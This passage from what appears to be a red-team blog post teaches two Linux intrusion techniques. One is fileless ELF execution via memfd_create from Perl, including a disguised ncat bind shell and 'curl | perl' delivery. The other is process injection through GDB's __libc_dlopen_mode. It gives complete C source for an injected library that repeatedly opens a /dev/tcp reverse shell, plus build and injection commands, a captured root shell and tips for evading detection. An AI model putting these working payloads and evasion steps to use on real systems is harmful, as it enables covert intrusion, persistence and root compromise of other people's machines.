lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted)

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it.

Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle:

open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);

We now have a file handle which refers to our anonymous file.

Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file.

perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary

This will give us many, many lines similar to:

print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/;
print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/;
print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/;

Exceuting those puts our ELF binary into memory. Time to run it.

Optional: fork(2)

Ok, fork(2) is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like:

while ($keep_going) {
        my $pid = fork();
        if (-1 == $pid) { # Error
                die "fork: $!";
        }
        if (0 == $pid) { # Child
                # Do child things here
                exit 0;
        }
}

Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate:

# Spawn child
my $pid = fork();
if (-1 == $pid) { # Error
        die "fork1: $!";
}
if (0 != $pid) { # Parent terminates
        exit 0;
}
# In the child, become session leader
if (-1 == syscall(112)) {
        die "setsid: $!";
}

# Spawn grandchild
$pid = fork();
if (-1 == $pid) { # Error
        die "fork2: $!";
}
if (0 != $pid) { # Child terminates
        exit 0;
}
# In the grandchild here, do grandchild things

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albiet with easier syntax.

We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else.

The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!";

The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the/proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list:

cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"'

This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all.

Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink.

If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2).

Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast. asciicast

In C (translate to your non-disk-touching language of choice):

  1. fd = memfd_create("", MFD_CLOEXEC);
  2. write(pid, elfbuffer, elfbuffer_len);
  3. asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL);

Process Injection with GDB

Inspired by excellent CobaltStrike training, I set out to work out an easy way to inject into processes in Linux. There’s been quite a lot of experimentation with this already, usually using ptrace(2) orLD_PRELOAD, but I wanted something a little simpler and less error-prone, perhaps trading ease-of-use for flexibility and works-everywhere. Enter GDB and shared object files (i.e. libraries).

GDB, for those who’ve never found themselves with a bug unsolvable with lots of well-placed printf("Here\n") statements, is the GNU debugger. It’s typical use is to poke at a runnnig process for debugging, but it has one interesting feature: it can have the debugged process call library functions. There are two functions which we can use to load a library into to the program: dlopen(3)from libdl, and __libc_dlopen_mode, libc’s implementation. We’ll use __libc_dlopen_mode because it doesn’t require the host process to have libdl linked in.

In principle, we could load our library and have GDB call one of its functions. Easier than that is to have the library’s constructor function do whatever we would have done manually in another thread, to keep the amount of time the process is stopped to a minimum. More below.

Caveats

Trading flexibility for ease-of-use puts a few restrictions on where and how we can inject our own code. In practice, this isn’t a problem, but there are a few gotchas to consider.

ptrace(2)

We’ll need to be able to attach to the process with ptrace(2), which GDB uses under the hood. Root can usually do this, but as a user, we can only attach to our own processes. To make it harder, some systems only allow processes to attach to their children, which can be changed via a sysctl. Changing the sysctl requires root, so it’s not very useful in practice. Just in case:

sysctl kernel.yama.ptrace_scope=0
# or
echo 0 > /proc/sys/kernel/yama/ptrace_scope

Generally, it’s better to do this as root.

Stopped Processes

When GDB attaches to a process, the process is stopped. It’s best to script GDB’s actions beforehand, either with -x and --batch or echoing commands to GDB minimize the amount of time the process isn’t doing whatever it should be doing. If, for whatever reason, GDB doesn’t restart the process when it exits, sending the process SIGCONT should do the trick.

kill -CONT <PID>

Process Death

Once our library’s loaded and running, anything that goes wrong with it (e.g. segfaults) affects the entire process. Likewise, if it writes output or sends messages to syslog, they’ll show up as coming from the process. It’s not a bad idea to use the injected library as a loader to spawn actual malware in new proceses.

On Target

With all of that in mind, let’s look at how to do it. We’ll assume ssh access to a target, though in principle this can (should) all be scripted and can be run with shell/sql/file injection or whatever other method.

Process Selection

First step is to find a process into which to inject. Let’s look at a process listing, less kernel threads:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# ps -fxo pid,user,args | egrep -v ' \[\S+\]$'
  PID USER     COMMAND
    1 root     /sbin/init
  625 root     /lib/systemd/systemd-journald
  664 root     /sbin/lvmetad -f
  696 root     /lib/systemd/systemd-udevd
 1266 root     /sbin/iscsid
 1267 root     /sbin/iscsid
 1273 root     /usr/lib/accountsservice/accounts-daemon
 1278 root     /usr/sbin/sshd -D
 1447 root      \_ sshd: root@pts/1
 1520 root          \_ -bash
 1538 root              \_ ps -fxo pid,user,args
 1539 root              \_ grep -E --color=auto -v  \[\S+\]$
 1282 root     /lib/systemd/systemd-logind
 1295 root     /usr/bin/lxcfs /var/lib/lxcfs/
 1298 root     /usr/sbin/acpid
 1312 root     /usr/sbin/cron -f
 1316 root     /usr/lib/snapd/snapd
 1356 root     /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
 1358 root     /usr/lib/policykit-1/polkitd --no-debug
 1413 root     /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
 1415 root     /sbin/agetty --noclear tty1 linux
 1449 root     /lib/systemd/systemd --user
 1451 root      \_ (sd-pam)

Some good choices in there. Ideally we’ll use a long-running process which nobody’s going to want to kill. Processes with low pids tend to work nicely, as they’re started early and nobody wants to find out what happens when they die. It’s helpful to inject into something running as root to avoid having to worry about permissions. Even better is a process that nobody wants to kill but which isn’t doing anything useful anyway.

In some cases, something short-lived, killable, and running as a user is good if the injected code only needs to run for a short time (e.g. something to survey the box, grab creds, and leave) or if there’s a good chance it’ll need to be stopped the hard way. It’s a judgement call.

We’ll use 664 root /sbin/lvmetad -f. It should be able to do anything we’d like and if something goes wrong we can restart it, probably without too much fuss.

Malware

More or less any linux shared object file can be injected. We’ll make a small one for demonstration purposes, but I’ve injected multi-megabyte backdoors written in Go as well. A lot of the fiddling that went into making this blog post was done using pcapknock.

For the sake of simplicity, we’ll use the following. Note that a lot of error handling has been elided for brevity. In practice, getting meaningful error output from injected libraries’ constructor functions isn’t as straightforward as a simple warn("something"); return; unless you really trust the standard error of your victim process.

#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

#define SLEEP  120                    /* Time to sleep between callbacks */
#define CBADDR "<REDACTED>"           /* Callback address */
#define CBPORT "4444"                 /* Callback port */

/* Reverse shell command */
#define CMD "echo 'exec >&/dev/tcp/"\
            CBADDR "/" CBPORT "; exec 0>&1' | /bin/bash"

void *callback(void *a);

__attribute__((constructor)) /* Run this function on library load */
void start_callbacks(){
        pthread_t tid;
        pthread_attr_t attr;

        /* Start thread detached */
        if (-1 == pthread_attr_init(&attr)) {
                return;
        }
        if (-1 == pthread_attr_setdetachstate(&attr,
                                PTHREAD_CREATE_DETACHED)) {
                return;
        }

        /* Spawn a thread to do the real work */
        pthread_create(&tid, &attr, callback, NULL);
}

/* callback tries to spawn a reverse shell every so often.  */
void *
callback(void *a)
{
        for (;;) {
                /* Try to spawn a reverse shell */
                system(CMD);
                /* Wait until next shell */
                sleep(SLEEP);
        }
        return NULL;
}

In a nutshell, this will spawn an unencrypted, unauthenticated reverse shell to a hardcoded address and port every couple of minutes. The __attribute__((constructor)) applied to start_callbacks() causes it to run when the library is loaded. All start_callbacks() does is spawn a thread to make reverse shells.

Building a library is similar to building any C program, except that -fPIC and -shared must be given to the compiler.

cc -O2 -fPIC -o libcallback.so ./callback.c -lpthread -shared

It’s not a bad idea to optimize the output with -O2 to maybe consume less CPU time. Of course, on a real engagement the injected library will be significantly more complex than this example.

Injection

Now that we have the injectable library created, we can do the deed. First thing to do is start a listener to catch the callbacks:

nc -nvl 4444 #OpenBSD netcat ftw!

__libc_dlopen_mode takes two arguments, the path to the library and flags as an integer. The path to the library will be visible, so it’s best to put it somewhere inconspicuous, like /usr/lib. We’ll use 2 for the flags, which corresponds to dlopen(3)’s RTLD_NOW. To get GDB to cause the process to run the function, we’ll use GDB’s print command, which conviently gives us the function’s return value. Instead of typing the command into GDB, which takes eons in program time, we’ll echo it into GDB’s standard input. This has the nice side-effect of causing GDB to exit without needing a quitcommand.

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# echo 'print __libc_dlopen_mode("/root/libcallback.so", 2)' | gdb -p 664
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
...snip...
0x00007f6ca1cf75d3 in select () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) [New Thread 0x7f6c9bfff700 (LWP 1590)]
$1 = 312536496
(gdb) quit
A debugging session is active.

        Inferior 1 [process 664] will be detached.

Quit anyway? (y or n) [answered Y; input not from terminal]
Detaching from program: /sbin/lvmetad, process 664

Checking netcat, we’ve caught the callback:

[stuart@c2server:/home/stuart]
$ nc -nvl 4444
Connection from <REDACTED> 50184 received!
ps -fxo pid,user,args
...snip...
  664 root     /sbin/lvmetad -f
 1591 root      \_ sh -c echo 'exec >&/dev/tcp/<REDACTED>/4444; exec 0>&1' | /bin/bash
 1593 root          \_ /bin/bash
 1620 root              \_ ps -fxo pid,user,args
...snip...

That’s it, we’ve got execution in another process.

If the injection had failed, we’d have seen $1 = 0, indicating__libc_dlopen_mode returned NULL.

Artifacts

There are several places defenders might catch us. The risk of detection can be minimized to a certain extent, but without a rootkit, there’s always some way to see we’ve done something. Of course, the best way to hide is to not raise suspicions in the first place.

Process listing

A process listing like the one above will show that the process into which we’ve injected malware has funny child processes. This can be avoided by either having the library doule-fork a child process to do the actual work or having the injected library do everything from within the victim process.

Files on disk

The loaded library has to start on disk, which leaves disk artifacts, and the original path to the library is visible in /proc/pid/maps:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cat /proc/664/maps                                                      
...snip...
7f6ca0650000-7f6ca0651000 r-xp 00000000 fd:01 61077    /root/libcallback.so                        
7f6ca0651000-7f6ca0850000 ---p 00001000 fd:01 61077    /root/libcallback.so                        
7f6ca0850000-7f6ca0851000 r--p 00000000 fd:01 61077    /root/libcallback.so
7f6ca0851000-7f6ca0852000 rw-p 00001000 fd:01 61077    /root/libcallback.so            
...snip...

If we delete the library, (deleted) is appended to the filename (i.e./root/libcallback.so (deleted)), which looks even weirder. This is somewhat mitigated by putting the library somewhere libraries normally live, like /usr/lib, and naming it something normal-looking.

Service disruption

Loading the library stops the running process for a short amount of time, and if the library causes process instability, it may crash the process or at least cause it to log warning messages (on a related note, don’t inject into systemd(1), it causes segfaults and makes shutdown(8) hang the box).

Process injection on Linux is reasonably easy:

  1. Write a library (shared object file) with a constructor.
  2. Load it with echo 'print __libc_dlopen_mode("/path/to/library.so", 2)' | gdb -p <PID>